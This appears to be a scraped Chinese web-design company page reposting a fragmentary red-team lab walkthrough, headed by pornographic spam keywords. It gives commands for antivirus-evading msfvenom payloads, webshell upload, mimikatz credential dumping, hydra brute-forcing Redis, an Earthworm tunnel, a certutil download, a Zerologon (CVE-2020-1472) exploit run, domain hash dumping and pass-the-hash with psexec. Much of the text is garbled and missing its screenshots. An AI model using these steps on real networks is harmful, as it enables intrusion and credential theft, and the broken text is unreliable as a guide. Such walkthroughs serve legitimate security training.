欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

服務(wù)器攻防安全技巧 服務(wù)器攻防要學(xué)什么

安全攻防實戰(zhàn)系列MSF

前言

創(chuàng)新互聯(lián)網(wǎng)站建設(shè)服務(wù)商,為中小企業(yè)提供做網(wǎng)站、網(wǎng)站制作服務(wù),網(wǎng)站設(shè)計,網(wǎng)站托管維護(hù)等一站式綜合服務(wù)型公司,專業(yè)打造企業(yè)形象網(wǎng)站,讓您在眾多競爭對手中脫穎而出創(chuàng)新互聯(lián)

在紅隊攻防中,我們主要在外網(wǎng)進(jìn)行信息收集,通過cms或者其他春饑漏洞拿到shell,之后通過免殺木馬將windows或linux服務(wù)器上線到cobalt strike或msf等c2服務(wù)器,之后對內(nèi)網(wǎng)進(jìn)行信息收集并繪制網(wǎng)絡(luò)拓?fù)鋱D,進(jìn)行工作組或域滲透,拿到各個網(wǎng)段機(jī)器的權(quán)限,遠(yuǎn)程登陸并截圖證明。

環(huán)境配置

從虛擬機(jī)網(wǎng)絡(luò)來看

機(jī)器描述

目錄如下

蟻劍拿shell

msf免殺拿shell

使用msfvenom生成免殺木馬payload,里面的IP和端口自行修改,就是反彈shell的kali

使用分離免殺工具生成loader.exe文件

對生成的exe文件進(jìn)行加殼免殺

免殺效果如下

免殺之后通過蟻劍上傳到server-bt上

msf開啟監(jiān)聽

蟻劍運行

getuid

ps

msf內(nèi)網(wǎng)滲透

load mimikatz # 加載Mimikatz模塊

成功開啟了遠(yuǎn)程桌面,并且生成了一個txt文件,這個txt文件往后可用中森胡來關(guān)閉遠(yuǎn)程桌面,關(guān)閉命令

run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt

繞過火絨添加用戶

螞蟻劍或者cs上傳添加用戶.exe

遠(yuǎn)程登錄server-bt

然后再添加一個由system權(quán)限下開啟的桌面進(jìn)程

Earthworm穿透

上傳EW(Earthworm)到C:/wwwroot/

kali環(huán)境進(jìn)行爆破

proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379

利用過程

代理蟻劍進(jìn)賣攔行連接這個shell

并查看權(quán)限

Earthworm穿透

掛代理,通過之前上傳的EW(Earthworm)

服務(wù)器端執(zhí)行以下命令(關(guān)掉server-bt的防火墻代理才能生效)

execute C:\wwwroot\ew.exe -s ssocksd -l 1090

用msfvenom生成一個正向馬傳進(jìn)去(因為無法訪問外網(wǎng),反向出不來),msf正向連接。

使用分離免殺工具生成loader.exe文件

免殺效果如下

C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f msf1.exe

成功獲取服務(wù)器的shell,之后就是各種權(quán)限維持了。創(chuàng)建計劃任務(wù)、開機(jī)自啟等等都能夠?qū)崿F(xiàn)。

ps

添加賬戶和遠(yuǎn)程連接同第一層

load mimikatz # 加載Mimikatz模塊

這里已經(jīng)滿足觸發(fā)zerologon的兩個條件,能ping通域控制器,知道域控計算機(jī)名,當(dāng)然最后dump出域內(nèi)所有hash的時候需要域名

置空域控機(jī)器用戶NTLM hash

proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201

接下來用置空的機(jī)器賬戶dump所有hash

(890c這個hash就是"空"的NTML hash)

我們的目標(biāo)是獲得域內(nèi)administrator的hash,然后就可以hash傳遞,登陸任意域內(nèi)機(jī)器

利用 psexec(PTH)上線server-dc到 MSF:

成功獲取到shell

利用 psexec 上線server-ex13到 MSF:

本文名稱:服務(wù)器攻防安全技巧 服務(wù)器攻防要學(xué)什么
URL地址:http://chinadenli.net/article44/dspgihe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供移動網(wǎng)站建設(shè)網(wǎng)站策劃Google關(guān)鍵詞優(yōu)化自適應(yīng)網(wǎng)站面包屑導(dǎo)航

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

搜索引擎優(yōu)化